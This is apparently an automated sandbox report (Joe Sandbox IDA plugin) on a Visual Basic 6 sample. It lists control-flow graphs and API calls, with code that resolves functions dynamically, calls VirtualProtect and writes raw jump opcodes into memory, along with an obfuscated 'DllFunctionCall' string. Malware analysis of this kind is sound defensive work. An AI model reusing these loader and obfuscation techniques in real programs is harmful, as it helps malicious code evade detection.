                                                                    control_flow_graph 0 54b868-54bc49 __vbaChkstk __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 GetModuleHandleW __vbaFreeStrList __vbaChkstk call 54f663 __vbaStrVarVal __vbaStrToAnsi GetProcAddress __vbaFreeStrList __vbaFreeVar __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaChkstk call 54f663 __vbaStrVarVal #644 GetModuleHandleW __vbaFreeStrList __vbaFreeVarList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrToAnsi GetProcAddress __vbaFreeStrList __vbaRedim __vbaNew __vbaObjSet __vbaCastObj __vbaObjSet __vbaObjSetAddref __vbaFreeObjList __vbaObjSetAddref #644 __vbaFreeObj #644 call 54b152 call 54b161 9 54bc57-54bc60 0->9 10 54bc62-54bcaa __vbaAryLock #644 __vbaAryUnlock call 54b152 9->10 11 54bcac-54be46 __vbaObjSetAddref #644 __vbaFreeObj #644 call 54b16f __vbaAryLock #644 __vbaAryUnlock #644 call 54b152 __vbaRedim #644 call 54b152 #644 call 54b152 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 9->11 10->9 23 54be48-54be67 __vbaHresultCheckObj 11->23 24 54be69 11->24 25 54be70-54becc __vbaAryUnlock __vbaFreeStr #644 call 54b152 call 54b161 23->25 24->25 30 54beda-54bee3 25->30 31 54bee5-54bf31 __vbaAryLock #644 __vbaAryUnlock call 54b152 30->31 32 54bf33-54c07a #644 call 54b152 #644 call 54b152 #644 call 54b152 #644 call 54b152 #644 call 54b152 VirtualProtect 30->32 31->30 46 54c07c-54c09b __vbaHresultCheckObj 32->46 47 54c09d 32->47 48 54c0a4-54c0c8 call 54b161 46->48 47->48 51 54c0d6-54c0df 48->51 52 54c0e1-54c12d __vbaAryLock #644 __vbaAryUnlock call 54b152 51->52 53 54c12f-54c221 #644 call 54b152 #644 call 54b152 #644 call 54b152 call 54c478 __vbaFreeVar __vbaAryDestruct 51->53 52->51
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054B2C3,?,?,?,?,?,00401526), ref: 0054B885
                                                                    • __vbaStrCat.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8A1
                                                                    • __vbaStrMove.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8AB
                                                                    • __vbaStrCat.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8B6
                                                                    • __vbaStrMove.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8C0
                                                                    • __vbaStrCat.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8CB
                                                                    • __vbaStrMove.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8D5
                                                                    • #644.MSVBVM60(00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3), ref: 0054B8DB
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526), ref: 0054B8E1
                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,00401526,00000000,00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000), ref: 0054B8F9
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054B918
                                                                      • Part of subcall function 0054F663: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054F67F
                                                                      • Part of subcall function 0054F663: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401526), ref: 0054F697
                                                                      • Part of subcall function 0054F663: #653.MSVBVM60(?,?,?,00000008,?,?,00401526), ref: 0054F6A4
                                                                      • Part of subcall function 0054F663: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401526), ref: 0054F6AD
                                                                      • Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60 ref: 0054F6C6
                                                                      • Part of subcall function 0054F663: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054F6FB
                                                                      • Part of subcall function 0054F663: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F70C
                                                                      • Part of subcall function 0054F663: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F716
                                                                      • Part of subcall function 0054F663: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054F725
                                                                      • Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60(0054F768), ref: 0054F762
                                                                    • __vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054B93A
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054B944
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0054B950
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B964
                                                                    • __vbaFreeVar.MSVBVM60 ref: 0054B96F
                                                                    • __vbaStrCat.MSVBVM60(0040A728,0040A71C), ref: 0054B97E
                                                                    • __vbaStrMove.MSVBVM60(0040A728,0040A71C), ref: 0054B988
                                                                    • __vbaStrCat.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B993
                                                                    • __vbaStrMove.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B99D
                                                                    • __vbaStrCat.MSVBVM60(0040A74C,00000000,0040A738,00000000,0040A728,0040A71C), ref: 0054B9A8
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054B9BA
                                                                    • __vbaStrVarVal.MSVBVM60(00000000,?,?), ref: 0054B9DF
                                                                    • #644.MSVBVM60(00000000,00000000,?,?), ref: 0054B9E5
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,?), ref: 0054B9EB
                                                                    • __vbaFreeStrList.MSVBVM60(00000003,00000000,0040A738,00000000,00000000,00000000,00000000,?,?), ref: 0054BA03
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA18
                                                                    • __vbaStrCat.MSVBVM60(0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA2A
                                                                    • __vbaStrMove.MSVBVM60(0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA34
                                                                    • __vbaStrCat.MSVBVM60(0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA3F
                                                                    • __vbaStrMove.MSVBVM60(0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA49
                                                                    • __vbaStrCat.MSVBVM60(0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA54
                                                                    • __vbaStrMove.MSVBVM60(0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA5E
                                                                    • __vbaStrCat.MSVBVM60(0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA69
                                                                    • __vbaStrMove.MSVBVM60(0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA73
                                                                    • __vbaStrCat.MSVBVM60(0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728), ref: 0054BA7E
                                                                    • __vbaStrMove.MSVBVM60(0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728), ref: 0054BA88
                                                                    • __vbaStrCat.MSVBVM60(0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738), ref: 0054BA93
                                                                    • __vbaStrMove.MSVBVM60(0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738), ref: 0054BA9D
                                                                    • __vbaStrCat.MSVBVM60(0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BAA8
                                                                    • __vbaStrMove.MSVBVM60(0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BAB2
                                                                    • __vbaStrCat.MSVBVM60(0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BABD
                                                                    • __vbaStrMove.MSVBVM60(0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BAC7
                                                                    • __vbaStrCat.MSVBVM60(0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000), ref: 0054BAD2
                                                                    • __vbaStrMove.MSVBVM60(0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000), ref: 0054BADC
                                                                    • __vbaStrCat.MSVBVM60(0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000), ref: 0054BAE7
                                                                    • __vbaStrMove.MSVBVM60(0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000), ref: 0054BAF1
                                                                    • __vbaStrCat.MSVBVM60(0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000), ref: 0054BAFC
                                                                    • __vbaStrMove.MSVBVM60(0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000), ref: 0054BB06
                                                                    • __vbaStrCat.MSVBVM60(0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000), ref: 0054BB11
                                                                    • __vbaStrMove.MSVBVM60(0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000), ref: 0054BB1B
                                                                    • __vbaStrCat.MSVBVM60(0040A770,00000000,0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000), ref: 0054BB26
                                                                    • __vbaStrMove.MSVBVM60(0040A770,00000000,0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000), ref: 0054BB30
                                                                    • __vbaStrToAnsi.MSVBVM60(00000000,00000000,0040A770,00000000,0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000), ref: 0054BB3A
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0054BB46
                                                                    • __vbaFreeStrList.MSVBVM60(0000000E,00000000,0040A738,?,?,?,0040A758,0040A760,00000000,0040A768,00000000,0040A770,00000000,0040A778,00000000,00000000), ref: 0054BB8A
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000), ref: 0054BBA5
                                                                    • __vbaNew.MSVBVM60(0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000), ref: 0054BBB7
                                                                    • __vbaObjSet.MSVBVM60(0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788,00000000), ref: 0054BBC1
                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788), ref: 0054BBC7
                                                                    • __vbaObjSet.MSVBVM60(00000000,00000000,00000000,0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790), ref: 0054BBD1
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,00000000,0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000), ref: 0054BBDD
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,0040A780,00000000,00000000,00000000,00000000,00000000,0040A780,00000000,0040A7CC,0040A7DC), ref: 0054BBEC
                                                                    • __vbaObjSetAddref.MSVBVM60(0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788), ref: 0054BBFF
                                                                    • #644.MSVBVM60(00000000,0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000), ref: 0054BC05
                                                                    • __vbaFreeObj.MSVBVM60(00000000,0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000), ref: 0054BC10
                                                                    • #644.MSVBVM60(0040A71C,00000000,0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790), ref: 0054BC19
                                                                    • __vbaAryLock.MSVBVM60(0040A728,?,?,0040A71C,00000000), ref: 0054BC69
                                                                    • #644.MSVBVM60(0000000C,0040A728,?,?,0040A71C,00000000), ref: 0054BC81
                                                                    • __vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,?,?,0040A71C,00000000), ref: 0054BC90
                                                                    • __vbaObjSetAddref.MSVBVM60(0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCB7
                                                                    • #644.MSVBVM60(00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCBD
                                                                    • __vbaFreeObj.MSVBVM60(00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCC8
                                                                    • #644.MSVBVM60(005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCD6
                                                                    • __vbaAryLock.MSVBVM60(0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCF8
                                                                    • #644.MSVBVM60(0000000C,0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BD0F
                                                                    • __vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BD1E
                                                                    • #644.MSVBVM60(005C92D0,0040A728,0000000C,0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BD36
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,005C9214,00000003,00000001,00000010,00000000,0040A780,0040A71C,005C92D0,0040A728,0000000C,0040A728,?,00000000,0040A71C), ref: 0054BD7B
                                                                    • #644.MSVBVM60(?,?,0040A71C,00000000), ref: 0054BD87
                                                                    • #644.MSVBVM60(00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BDB0
                                                                    • __vbaAryLock.MSVBVM60(0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BDE4
                                                                    • __vbaStrCat.MSVBVM60(0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BE0C
                                                                    • __vbaStrMove.MSVBVM60(0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BE16
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BE1C
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C), ref: 0054BE34
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,005C92D0,0040A7DC,0000002C), ref: 0054BE5C
                                                                    • __vbaAryUnlock.MSVBVM60(0040A728), ref: 0054BE74
                                                                    • __vbaFreeStr.MSVBVM60(0040A728), ref: 0054BE7C
                                                                    • #644.MSVBVM60(?,0040A728), ref: 0054BE85
                                                                    • __vbaAryLock.MSVBVM60(0040A728,00000000,00000000,-0000000C,?,0040A728), ref: 0054BEEF
                                                                    • #644.MSVBVM60(0000000C,0040A728,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF07
                                                                    • __vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF16
                                                                    • #644.MSVBVM60(0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF44
                                                                    • #644.MSVBVM60(408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF72
                                                                    • #644.MSVBVM60(20C4832C,005C92D0,0040A714,408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BFA0
                                                                    • #644.MSVBVM60(E02474FF,005C92D0,0040A710,20C4832C,005C92D0,0040A714,408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BFCE
                                                                    • #644.MSVBVM60(0000E0FF,005C92D0,0040A70C,E02474FF,005C92D0,0040A710,20C4832C,005C92D0,0040A714,408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C), ref: 0054BFFC
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000040,00000000,005C92D0,0040A708,0000E0FF,005C92D0,0040A70C,E02474FF), ref: 0054C068
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,005C92D0,0040A7DC,00000020), ref: 0054C090
                                                                    • __vbaAryLock.MSVBVM60(0040A728,00000000), ref: 0054C0EB
                                                                    • #644.MSVBVM60(0000000C,0040A728,00000000), ref: 0054C103
                                                                    • __vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,00000000), ref: 0054C112
                                                                    • #644.MSVBVM60(005C92CC,00000000), ref: 0054C138
                                                                    • #644.MSVBVM60(0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C157
                                                                    • #644.MSVBVM60(00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C177
                                                                    • __vbaFreeVar.MSVBVM60(00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C197
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054C222,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C21C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Move$Free$List$LockUnlock$Chkstk$Addref$AddressAnsiCheckHandleHresultModuleProcProtectRedimVirtual$#632#653CastDestruct
                                                                    • String ID: @$DqlqlqFquqnqcqtqiqoqnqCqaqlqlq$bvm
                                                                    • API String ID: 4157516495-683613472
                                                                    • Opcode ID: 6f74a6ac4e4874fd9fba4c8bae260d56d608135e4d8541de1c61dc6ea2593dd3
                                                                    • Instruction ID: e1eb3e7dbfe43c06f703cb93ee5700968631c055528dc72762265e7630ec5018
                                                                    • Opcode Fuzzy Hash: 6f74a6ac4e4874fd9fba4c8bae260d56d608135e4d8541de1c61dc6ea2593dd3
                                                                    • Instruction Fuzzy Hash: 19421CB1D00208AFDB01EBA5CC86FEE77B9FF44308F10446AF505B71A2DA799A448F65

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 66 54d027-54d08b __vbaChkstk __vbaObjSetAddref 68 54d0a7 66->68 69 54d08d-54d0a5 __vbaHresultCheckObj 66->69 70 54d0ae-54d0ba 68->70 69->70 71 54d0c1-54d187 __vbaObjSetAddref call 54eec1 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaFreeVar __vbaObjSetAddref call 54eec1 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaFreeVar 70->71 72 54d0bc 70->72 80 54d1a3 71->80 81 54d189-54d1a1 __vbaHresultCheckObj 71->81 73 54dc4e-54dcb8 __vbaAryUnlock __vbaAryDestruct __vbaFreeObj * 2 __vbaAryDestruct __vbaFreeObj 72->73 82 54d1aa-54d1ce 80->82 81->82 84 54d1d0-54d1e8 __vbaHresultCheckObj 82->84 85 54d1ea 82->85 86 54d1f1-54d215 84->86 85->86 88 54d217-54d22f __vbaHresultCheckObj 86->88 89 54d231 86->89 90 54d238-54d310 __vbaObjSetAddref call 54ed02 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref call 54ed02 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref call 54ed02 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj 88->90 89->90 98 54d312-54d32a __vbaHresultCheckObj 90->98 99 54d32c 90->99 100 54d333-54d357 98->100 99->100 102 54d373 100->102 103 54d359-54d371 __vbaHresultCheckObj 100->103 104 54d37a-54d39e 102->104 103->104 106 54d3a0-54d3b8 __vbaHresultCheckObj 104->106 107 54d3ba 104->107 108 54d3c1-54d3df 106->108 107->108 110 54d3e1-54d3f9 __vbaHresultCheckObj 108->110 111 54d3fb 108->111 112 54d402-54d458 __vbaRedim __vbaAryLock 110->112 111->112 114 54d474 112->114 115 54d45a-54d472 __vbaHresultCheckObj 112->115 116 54d47b-54d492 __vbaAryUnlock 114->116 115->116 117 54d494-54d4b1 call 54e01f 116->117 118 54d4c2-54d4d0 116->118 122 54d4b6-54d4bb 117->122 120 54d4e7-54d505 118->120 121 54d4d2-54d4d6 call 54dd50 118->121 128 54d507-54d51f __vbaHresultCheckObj 120->128 129 54d521 120->129 125 54d4db-54d4e0 121->125 122->118 124 54d4bd 122->124 124->73 125->120 127 54d4e2 125->127 127->73 130 54d528-54d52c 128->130 129->130 131 54d532-54d539 130->131 132 54d67f-54d6e4 __vbaAryLock #644 __vbaAryUnlock call 54b161 call 54b3eb __vbaObjSet 130->132 131->132 134 54d53f-54d595 __vbaRedim __vbaAryLock 131->134 142 54d6e6-54d706 __vbaRedim 132->142 143 54d709-54d73e 132->143 138 54d597-54d5af __vbaHresultCheckObj 134->138 139 54d5b1 134->139 141 54d5b8-54d5cf __vbaAryUnlock 138->141 139->141 144 54d5d1-54d5f8 call 54e01f 141->144 145 54d5ff-54d60d 141->145 142->143 150 54d744-54d775 __vbaAryLock 143->150 151 54dc42-54dc49 143->151 144->145 158 54d5fa 144->158 148 54d624-54d67a __vbaAryLock #644 __vbaAryUnlock call 54b161 call 54b3eb __vbaObjSet 145->148 149 54d60f-54d61d call 54dd50 145->149 148->132 149->148 162 54d61f 149->162 154 54db3c-54db60 150->154 155 54d77b-54d799 150->155 151->73 165 54db62-54db7a __vbaHresultCheckObj 154->165 166 54db7c 154->166 167 54d7b5 155->167 168 54d79b-54d7b3 __vbaHresultCheckObj 155->168 158->73 162->73 170 54db83-54db8d 165->170 166->170 169 54d7bc-54d853 __vbaVarDup #607 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList #644 167->169 168->169 174 54d855-54d86d __vbaHresultCheckObj 169->174 175 54d86f 169->175 171 54db93-54dc01 __vbaRedim __vbaAryLock 170->171 172 54dc2d-54dc38 __vbaAryUnlock 170->172 177 54dc03-54dc1b __vbaHresultCheckObj 171->177 178 54dc1d 171->178 172->151 179 54d876-54d894 174->179 175->179 180 54dc24-54dc28 __vbaAryUnlock 177->180 178->180 182 54d896-54d8ae __vbaHresultCheckObj 179->182 183 54d8b0 179->183 180->172 184 54d8b7-54d93b __vbaVarDup #606 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar #644 182->184 183->184 186 54d957 184->186 187 54d93d-54d955 __vbaHresultCheckObj 184->187 188 54d95e-54d97c 186->188 187->188 190 54d97e-54d996 __vbaHresultCheckObj 188->190 191 54d998 188->191 192 54d99f-54da23 __vbaVarDup #606 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar #644 190->192 191->192 194 54da25-54da3d __vbaHresultCheckObj 192->194 195 54da3f 192->195 196 54da46-54da6a 194->196 195->196 198 54da86 196->198 199 54da6c-54da84 __vbaHresultCheckObj 196->199 200 54da8d-54da97 198->200 199->200 201 54db37 200->201 202 54da9d-54db0b __vbaRedim __vbaAryLock 200->202 201->172 204 54db27 202->204 205 54db0d-54db25 __vbaHresultCheckObj 202->205 206 54db2e-54db32 __vbaAryUnlock 204->206 205->206 206->201
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054D044
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054D05D
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D09A
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0054D0C8
                                                                      • Part of subcall function 0054EEC1: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054EEDD
                                                                      • Part of subcall function 0054EEC1: __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054EEF6
                                                                      • Part of subcall function 0054EEC1: __vbaVarMove.MSVBVM60 ref: 0054EF15
                                                                      • Part of subcall function 0054EEC1: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054EF47
                                                                      • Part of subcall function 0054EEC1: __vbaVarCmpGt.MSVBVM60(?,005C92C0,00008003,0000000B), ref: 0054EF93
                                                                      • Part of subcall function 0054EEC1: __vbaVarOr.MSVBVM60(?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EF9D
                                                                      • Part of subcall function 0054EEC1: __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFA3
                                                                      • Part of subcall function 0054EEC1: __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFAF
                                                                      • Part of subcall function 0054EEC1: __vbaFreeObj.MSVBVM60(0054F0AB,?,00006011,?), ref: 0054F0A5
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 0054D0DB
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 0054D0E5
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 0054D0F5
                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 0054D0FD
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 0054D105
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 0054D10D
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 0054D119
                                                                      • Part of subcall function 0054EEC1: __vbaRedim.MSVBVM60(00000080,00000001,005C9220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFD8
                                                                      • Part of subcall function 0054EEC1: __vbaAryLock.MSVBVM60(?), ref: 0054EFEA
